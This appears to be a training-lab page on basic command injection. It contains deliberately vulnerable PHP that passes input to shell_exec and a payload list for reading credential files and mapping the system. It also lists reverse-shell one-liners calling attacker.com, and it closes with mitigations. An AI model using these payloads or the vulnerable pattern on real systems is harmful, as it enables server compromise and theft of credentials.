Lab 1: Basic Command Injection - Command Injection Labs

Difficulty: Low

Lab Overview

This lab demonstrates a basic command injection vulnerability where user input is directly used in system commands without proper validation or sanitization. The application allows execution of arbitrary commands on the server.

Objective: Inject and execute arbitrary commands to achieve code execution and information disclosure.

Vulnerable Code

// Vulnerable: Direct execution without validation
function execute_command($command) {
    if (empty($command)) {
        return "No command specified.";
    }
    
    // Vulnerable: Direct execution using shell_exec
    $output = @shell_exec($command . ' 2>&1');
    
    if ($output === null) {
        return "Command execution failed or no output.";
    }
    
    return $output;
}

Command Execution

Available Commands

Try these basic commands:

whoami - Current user
id - User ID information
pwd - Current directory
ls - List files
uname -a - System information

Vulnerability Details

Type: Command Injection
Severity: High
Method: POST
Issue: Direct command execution without validation

Test Payloads

whoami - Basic command
id; ls - Multiple commands
cat /etc/passwd - File reading
ps aux - Process listing

Command Injection Payloads

Use these payloads to test the command injection vulnerability:

1. Basic Information Gathering:

whoami
id
pwd
uname -a
hostname
date

2. File System Access:

ls -la
cat /etc/passwd
cat /etc/hosts
cat /etc/shadow
cat /proc/version
cat /proc/cpuinfo

3. Process and System Information:

ps aux
ps -ef
netstat -an
ss -tuln
lsof -i
df -h
free -m

4. Network Information:

ifconfig
ip addr
route -n
arp -a
nslookup google.com
ping -c 3 8.8.8.8

5. User and Permission Information:

groups
sudo -l
crontab -l
history
env
printenv

6. Multiple Command Execution:

whoami; id; pwd
ls -la; cat /etc/passwd
ps aux; netstat -an
whoami && id && pwd
whoami || id || pwd

7. Command Substitution:

echo $(whoami)
echo `id`
echo $(cat /etc/passwd)
echo `ls -la`

8. Pipe and Redirection:

whoami | cat
id > /tmp/output.txt
ls -la | grep php
cat /etc/passwd | head -5

9. Environment Variables:

echo $PATH
echo $HOME
echo $USER
echo $SHELL
echo $PWD

10. File Operations:

touch /tmp/test.txt
echo "test" > /tmp/test.txt
cat /tmp/test.txt
rm /tmp/test.txt
mkdir /tmp/testdir
rmdir /tmp/testdir

11. Advanced Commands:

find / -name "*.php" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null
find / -perm -4000 2>/dev/null
find / -writable 2>/dev/null

12. Reverse Shell (Dangerous):

bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -e /bin/bash attacker.com 4444
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Real-World Attack Scenarios

Execute arbitrary commands on the server
Access sensitive files and directories
Bypass authentication and authorization
Data exfiltration and sensitive information disclosure
Server compromise and lateral movement
Compliance violations and security breaches

Mitigation Strategies

Implement proper input validation and sanitization
Use whitelist-based command validation
Avoid direct command execution functions
Use parameterized commands and safe APIs
Implement proper access controls and permissions
Regular security testing and vulnerability assessments
Monitor for unusual command execution patterns